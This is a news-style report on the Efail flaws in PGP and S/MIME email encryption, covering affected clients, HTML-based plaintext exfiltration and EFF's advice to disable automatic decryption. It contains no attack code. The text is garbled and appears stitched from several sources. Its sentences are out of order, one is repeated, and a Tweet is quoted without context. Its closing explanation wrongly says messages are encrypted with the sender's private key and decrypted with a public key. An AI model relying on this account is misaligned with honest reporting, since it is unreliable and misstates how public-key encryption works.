The team had been due to publish its full findings on Tuesday but rushed them out after the news made waves among the community of encrypted email users that includes activists, whistleblowers and journalists working in hostile environments.
German researchers have warned those using a popular form of email encryption that serious flaws mean their messages could be decoded by attackers. Thunderbird, Apple Mail, and Outlook are the three major email providers who need to be wary of the exploit as they use PGP encryption.
The researchers note that S/MIME uses Cipher Block Chaining, while OpenPGP uses Cipher Feedback, both of which are exploitable in similar ways.
A second Tweet warns "There are now no reliable fixes for the vulnerability".
Users should immediately disable or remove any tools that automatically decrypt PGP-encrypted emails until the flaws are understood and fixed, EFF said.
Efail attacks work by abusing the active content of HTML emails to access or "exfiltrate" plaintext. "There is a real attack that can be exploited by people that allows them to decrypt a lot of encrypted email".
The EFAIL vulnerabilities, which now have no software patch, "might reveal the plaintext of encrypted emails, including encrypted emails sent in the past", according to researchers. The first is a "direct exfiltration" attack that relies on clients such as Apple Mail, iOS Mail, and Mozilla Thunderbird rendering encrypted email as HTML. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past.
Disabling PGP and S/MIME are seen as conservative stopgaps until proper mitigation can be applied more broadly.
It also said that users should switch for the time being to non-email-based secure messaging apps such as Signal for sensitive communications.
Security researchers claim to have discovered a set of vulnerabilities (collectively called Efail) that affect users of certain email clients that utilise PGP (Pretty Good Privacy) and S/MIME (Secure/ Multipurpose Internet Mail Extensions) - two widely used methods for encrypting emails. This is then encrypted with the sender's private "key" and decrypted by the receiver using a separate public key.